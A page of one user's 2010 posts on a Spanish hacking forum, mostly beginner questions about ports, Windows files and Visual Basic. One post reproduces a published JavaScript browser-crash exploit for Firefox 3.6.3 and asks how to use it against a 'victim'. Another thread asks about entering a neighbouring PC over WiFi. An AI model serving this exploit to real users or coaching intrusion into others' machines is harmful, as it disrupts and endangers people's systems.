elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14 15 16
111  Seguridad Informática / Seguridad / Duda sobre mi seguridad en internet en: 23 Septiembre 2010, 13:02 pm
Hola tengo una duda... queria a ver si me la podian explocar: Si tengo todos los puertos cerrados de mi ordenador... alguien puede acceder a el??(usando expoits)

Pienso que al no tener puertos abiertos el exploit no funcionara.. pero no estoy seguro me gustaria que me explicaran esta cuestion..

Un saludo y muxas gracias!!
112  Seguridad Informática / Bugs y Exploits / Re: Como utilizo este sploit en: 18 Septiembre 2010, 18:52 pm
Muchas gracias!!
113  Seguridad Informática / Bugs y Exploits / Re: Como utilizo este sploit en: 18 Septiembre 2010, 18:43 pm
Donde se supongo que dice: "conseguir una consola remota". Eso es para provocar un DoS en el navegador remoto, que es muy diferente a obtener una consola remota, además esta hecho en javascript, tampoco se puede tirar a conseguir tanto con él.

Ok... aora creo que lo entiendo mejor...

Y por cierto hay exploits que consigan hacer consolas remotas?
114  Seguridad Informática / Bugs y Exploits / Como utilizo este sploit en: 18 Septiembre 2010, 18:15 pm
Código:
================================
Mozilla Firefox 3.6.3 Remote Dos
================================


# Author: PoisonCode
# Download Exploit Code
# Download Vulnerable app
# Title:Mozilla Firefox 3.6.3 Remote Dos
# Software Link:http://www.mozilla-europe.org/es/firefox/
# Version: v3.6.3
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()

_____    _____                      _ _         
|  __ \ / ____|                    (_) |       
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/


Lo Guardamos como un html y lo subimos algun host

Exploit
-----------------------------------------

<body onload="javascript:bufov();"></body>
 
<script>
 
function bufov() {
var b = '\x00\x13\xFF\x20\x00\x13\xFF\x24\x00\xE7\x08\x6D';
for (a =0;a<99999999999;a++) {
b+=b+'\x00\x13\xFF\x20\x00\x13\xFF\x24\x00\xE7\x08\x6D';
document.write('<html><marquee><h1>'+b+b);

}
 
}
 
</script>



# Inj3ct0r.com [2010-06-16]

Hola,  quería saber como puedo utilizar este exploit... He creado un servidor apache y en el index.html lo he editado y he puesto el código del exploit que pone ... pero una vez que la victima abra el exploit ¿¿¿que debo hacer??? Se supone que es para conseguir una consola remota(al menos es lo que dice).
Muchas gracias!!!
115  Sistemas Operativos / Windows / Para que sirve este archivo de windows?? en: 12 Septiembre 2010, 13:14 pm
El archivos services de esta rama de carpetas...
Lo abri con blog de notas y salen multiples servicios...
La pregunta es que si tiene una utilidad o es solo para mostrar todos los servicios que tiene...

C:\WINDOWS\system32\drivers\etc\services

Gracias!!!
116  Programación / Programación Visual Basic / Re: Duda con TabStrip en: 31 Julio 2010, 09:38 am
Gracias!!!! Mirare a ver si los encuentro!!!
117  Seguridad Informática / Hacking / Re: Que puedo hacer conectado a traves de WIFI a la otra pc??? en: 31 Julio 2010, 09:36 am
Desviaste la respuesta, cambias de porque quieres entrar a un ordenador conectado al router a que te dañaron el router cargando un firmware no compatible.

Ya e dixo que era simplemente casualidad...

No es para hacerle daño si no por curiosidad.
118  Programación / Programación Visual Basic / Re: Duda con TabStrip en: 28 Julio 2010, 18:04 pm
Me refiero a cambiarlo de color... Losiento..  :P jeje
119  Programación / Programación Visual Basic / Duda con TabStrip en: 28 Julio 2010, 18:04 pm
Hola queria saber si hay alguna fotma de cambiar el fondo de el Tab Strib que hay en Microsoft Windows Common Controls 6.0

Gracias!!! Un saludo
120  Seguridad Informática / Hacking / Re: Que puedo hacer conectado a traves de WIFI a la otra pc??? en: 25 Julio 2010, 18:14 pm
Yo te tengo una pregunta un tanto diferente, para que quieres entrar a otra pc conectada via Wifi? No me vengas con la respuesta de para aprender que es una excusa diria yo que sobreusada.

jeje si la verdad qe si... pues mi escusa es para practicar  para evitar que me jodan el ruter... Una vez se metieron en mi ruter y cargaron otro firmware que no era compatible... me jodieron todo el ruter y estuve sin internet 1semana.. y eso.. aora tengo WPA y e cambiado el pass por defecto.. pero curiosidad basicamente..
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines